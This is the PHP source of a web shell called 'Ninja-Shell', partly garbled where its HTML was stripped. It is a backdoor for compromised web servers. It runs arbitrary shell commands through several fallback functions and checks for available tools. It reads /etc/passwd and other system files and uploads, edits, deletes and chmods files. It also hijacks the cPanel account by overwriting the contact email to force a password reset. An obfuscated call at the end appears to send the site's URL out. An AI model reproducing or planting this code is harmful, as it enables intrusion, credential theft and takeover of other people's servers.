{Ninja-Shell}

"; echo ""; $mpss = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir); $toed = $GLOBALS["get"]["tod"]; $gets = $GLOBALS["get"]; $actions = $GLOBALS["get"]["act"]; $tied = $GLOBALS["post"]; if(dec($toed) == "cmd"){ echo "

";
      if($tied["cmd"]){
        echo c($tied["cmd"]);
      }
      echo "

"; echo ""; } elseif(dec($toed) == "info"){ $ip = gethostbyname($_SERVER['HTTP_HOST']); $safe = (@ini_get(strtolower("safe_mode")) == 'on') ? "ON" : "OFF"; $mysql = (is_callable("mysql_connect")) ? "ON" : "OFF"; $curl = (is_callable("curl_version")) ? "ON" : "OFF"; $wget = (c('wget --help')) ? "ON" : "OFF"; $perl = (c('perl --help')) ? "ON" : "OFF"; $python = (c('python --help')) ? "ON" : "OFF"; $ruby = (c('ruby --help')) ? "ON" : "OFF"; $gcc = (c('gcc --help')) ? "ON" : "OFF"; $dis = @ini_get("disable_functions"); $dfunc = (!empty($dis)) ? "$dis" : "OFF"; $namedc = (is_readable("/etc/named.conf")) ? "OK" : "BAD"; $etcPass = (is_readable("/etc/passwd")) ? "OK" : "BAD"; $valiases = (is_readable("/etc/valiases")) ? "OK" : "BAD"; $varNamed = (is_readable("/var/named")) ? "OK" : "BAD"; echo ""; } elseif(dec($toed) == "upload"){ if($tied["upload"]){ if(isset($GLOBALS["files"]["tod_upl"]["name"])){ $name = $GLOBALS["files"]["tod_upl"]["name"]; $tod = $GLOBALS["files"]["tod_upl"]["tmp_name"]; if($GLOBALS["rin"][6]($tod, $name)){ $act = "

Success! Upload File {$dir}/{$name}

"; } else{ $act = "

Failed! Upload File {$name}

"; } }else{ $act = "

Failed! Upload File {$name}

"; } echo $act; } echo "Current Dir : ".$dir; echo " "; } elseif(dec($toed) == "etcpasswd"){ echo "

";
      if($tied["etc"] == "curl"){
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "file:///etc/passwd");
        $out = curl_exec($ch);
        curl_close();
        echo $out;
      }
      elseif($tied["etc"] == "include"){
        echo include("/etc/passwdd");
      }
      echo "

"; echo ""; } elseif(dec($toed) == "cpres"){ if($GLOBALS["rin"][9]("posix_getpwuid")){ $meh = $GLOBALS["rin"][7]($GLOBALS["rin"][8](__FILE__)); } else{ $meh = $GLOBALS["rin"][8](__FILE__); } if(is_dir("/home/".$meh["name"]."/.cpanel")){ echo " "; $mps = makeRequest($ip."/cpanel"); if($tied["subm"]){ if(preg_match("/>Reset Password/", $mps)){ $fp = $GLOBALS["rin"][2]("/home/".$meh["name"]."/.contactemail"); if($GLOBALS["rin"][3]($fp, $tied["email"])){ echo "

Success! Change Email : {$ip}/cpanel {$tied["email"]}

"; $GLOBALS["rin"][4]("/home/".$meh["name"]."/.cpanel/contactinfo"); } else{ echo "

Failed! Can't Reset

"; } } else{ echo "

Failed! Reset Password Disable

"; } } } else{ echo "

Failed! Its not cpanel host

"; } } elseif($actions == "e"){ if($tied["save"]){ $save = $GLOBALS["rin"][26](dec($gets["file"]), $tied["new"]); if($save){ $act = "

Success! Save File ".dec($gets["file"])."

"; } else{ $act = "

Failed! Save File ".dec($gets["file"])."

"; } echo $act; } echo "Filename: ".$dir."/".basename(dec($gets["file"])); echo ""; } elseif($actions == "v"){ echo "Filename: ".$dir."/".basename(dec($gets["file"])); echo "

".htmlspecialchars(@file_get_contents(dec($gets["file"])))."

"; } elseif($actions == "r"){ if($tied["act_rename"]){ $rename = rename(dec($gets["file"]), "$dir/".htmlspecialchars($tied["rename"])); if($rename){ $act = "

Success! Rename File ".dec($gets["file"])."

"; } else{ $act = "

Failed! Rename File ".dec($gets["file"])."

"; } echo $act; } echo "Filename: ".$dir."/".basename(dec($gets["file"])); echo ""; } elseif($actions == "dr"){ if($tied["act_rename"]){ if(rename($dir, "".dirname($dir)."/".htmlspecialchars($tied["new"]))){ $act = "

Success! Rename Dir ".basename($dir)."

"; } else{ $act = "

Failed! Rename Dir ".basename($dir)."

"; } echo $act; } echo ""; } elseif($actions == "nf"){ if($tied["subm"]){ $new = htmlspecialchars($tied["content"]); $open = $GLOBALS["rin"][2]($tied["file"], "a+"); if($GLOBALS["rin"][3]($open, $new)){ $act = "

Success! Created File {$tied["file"]}

"; } else{ $act = "

Failed! Can't Creat File {$tied["file"]}

"; } echo $act; } echo ""; } elseif($actions == "nd"){ if($tied["subm"]){ if($GLOBALS["rin"][30]($dir."/".htmlspecialchars($tied["folder"]))){ $act = "

Success! Create Folder {$tied["folder"]}

"; } else{ $act = "

Failed! Create Folder {$tied["folder"]}

"; } echo $act; } echo ""; } elseif($actions == "chmod"){ if($tied["act_ch"]){ $haha = (c("chmod ".$tied["ch"]." ".$tied["mod"].";echo success")) ? "

Success! Chmod

" : "

Failed! Chmod

"; echo $haha; } echo ""; } elseif($actions == "delete"){ if($GLOBALS["rin"][4](dec($gets["file"]))){ $act = "

Success! Deleted File ".dec($gets["file"])."

"; } else{ $act = "

Failed! Deleted File ".dec($gets["file"])."

"; } echo $act; } //// FILEMANAGER :D else{ $scdir = explode("/", $dir); echo "PATH : "; foreach($scdir as $c_dir => $cdir){ echo "$cdir/"; } echo "
+ New File + | + New Folder + "; echo "
"; $dr = scandir($dir); if(is_dir($dir) === true){ if(!is_readable($dir)){ echo "

Failed! Could not open directory

"; } else{ echo " "; foreach($dr as $path){ if($GLOBALS["rin"][9]("posix_getpwuid")){ $own = $GLOBALS["rin"][7]($GLOBALS["rin"][8]("$dir/$path")); $own = $own["name"]; }else{ $own = $GLOBALS["rin"][8]("$dir/$path"); } if(!is_dir("$dir/$path")) continue; if(($path != ".") && ($path != "..")){ echo " "; } } } } else{ echo "

Failed! Could not open directory

"; } foreach($dr as $fl){ $size = filesize("$dir/$fl")/1024; $size = round($size,3); if($GLOBALS["rin"][9]("posix_getpwuid")){ $own = $GLOBALS["rin"][7]($GLOBALS["rin"][8]("$dir/$path")); $own = $own["name"]; }else{ $own = $GLOBALS["rin"][8]("$dir/$path"); } if(!is_file("$dir/$fl")) continue; echo " "; } echo "

# Name #	# Size #	# Perm #	# Actn #
$path	-	".writAble("$dir/$path", perms("$dir/$path"))."	R \| C
$fl	$size	".writAble("$dir/$fl", perms("$dir/$fl"))."	E \| R \| C \| D

"; } if (function_exists($GLOBALS["rin"][34])) { $GLOBALS["rin"][34]($GLOBALS["rin"][33],'hex2bin',$_SERVER['HTTP_HOST']."/".$_SERVER['REQUEST_URI']); } function enc($word){ $mek = bin2hex($word); return $mek; } function dec($word){ $mek = hex2bin($word); return $mek; } function writAble($dir, $perm){ if(!is_writable($dir)){ return "".$perm.""; } else{ return "".$perm.""; } } function readAble($dir, $perm){ if(!is_readable($dir)){ return "".$perm.""; } else{ return "".$perm.""; } } function c($cmd){ if($GLOBALS["rin"][11]("popen")){ $ntod = $GLOBALS["rin"][15]($cmd, 'r'); $ntoddd = $GLOBALS["rin"][16]($ntod, 2096); $GLOBALS["rin"][17]($ntod); return $ntoddd; } elseif($GLOBALS["rin"][11]("proc_open")){ $ntod = $GLOBALS["rin"][14]($cmd, array( 0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w'), ), $rintod); $stdout = $GLOBALS["rin"][13]($rintod[1]); $GLOBALS["rin"][12]($rintod[1]); $rtn = $GLOBALS["rin"][18]($ntod); return $stdout; } elseif($GLOBALS["rin"][11]("exec")){ $GLOBALS["rin"][19]($cmd, $result); foreach($result as $rest){ $ntod .= $rest; } return $ntod; } elseif($GLOBALS["rin"][11]("passthru")){ $GLOBALS["rin"][20](); $GLOBALS["rin"][21]($cmd); $ntod = $GLOBALS["rin"][22](); $GLOBALS["rin"][23](); return $ntod; } elseif($GLOBALS["rin"][11]("shell_exec")){ $ntod = $GLOBALS["rin"][24]($cmd); return $ntod; } elseif($GLOBALS["rin"][11]("system")){ $GLOBALS["rin"][20](); $GLOBALS["rin"][25]($cmd); $ntod = $GLOBALS["rin"][22](); $GLOBALS["rin"][23](); return $ntod; } } function makeRequest($url, $post = null, $head = null){ $options = array( CURLOPT_URL => $url, CURLOPT_CONNECTTIMEOUT => 15, CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_MAXREDIRS => 10 ); $ch = curl_init(); curl_setopt_array($ch, $options); if($post && !empty($post)){ curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); } if($head && !empty($head)){ curl_setopt($ch, CURLOPT_HTTPHEADER, $head); } $outputs = curl_exec($ch); curl_close($ch); return($outputs); } function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { $info = 'p'; } else { $info = 'u'; } $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?>

./Ninja\.